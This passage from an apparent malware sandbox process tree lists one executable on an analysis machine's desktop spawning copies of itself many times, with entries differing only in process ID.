      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7128
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6160
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7108
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7084
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7160
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7080
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6788
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5280
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5512
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5388
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:4164
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5600
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:684
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7172
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7180
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7188
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7204
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7212
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7220
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7228
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7236
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7244
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7252
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7260
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7268
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7280
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7288
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7296
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7304
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7312
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7320
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7328
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7336
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7344
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7352
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7364
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7372
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7380
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7388
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7396
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7404
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7412
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7420
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7428
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7436
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7444
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7452
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7460
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7468
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7476
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7484
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7492
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7500
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7508
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7516
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7524
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7532
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7540
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7548
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7556
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7564
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7572
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7580
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7588
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7596
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7604
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7612
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7628
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7636
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7644
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7652
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7660
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7668
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7676
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7684
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7692
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7700
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7708
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7716
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7724
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7732
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7740
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7748
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7756
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7764
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7772
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7780
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7788
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7796
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7804
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7812
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7820
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7828
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7836
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7844
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7852
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7860
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7868
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7876
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7884
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7892
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7900
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7908
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7916
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7924
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7932
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7948
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7956
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7964
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7972
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7980
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7988
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7996
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8004
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8012
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8024
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8032
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8040
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8048
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8056
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8064
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8072
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8080
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8088
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8096
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8104
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8112
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8120
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8128
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8136
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8144
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8152
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8160
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8168
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8176
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8184
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:2004
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7360
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5100
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:4376
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:2968
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:2844
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5228
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5920
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5732
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5260
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:4132
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:5504
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:2056
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7620
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:7944
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8020
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6076
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:6744
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8212
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8220
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8228
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8236
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8244
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8252
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8260
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8268
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8276
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8284
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8292
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8300
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8308
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8316
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8324
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8332
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8340
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8348
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8364
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8372
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8384
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8392
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8400
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8408
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8416
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8424
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8432
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8440
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8448
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8456
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8464
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8472
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8480
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8488
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8496
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8504
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8512
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8520
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8528
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8536
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8544
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8552
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8560
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8568
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8576
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8584
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
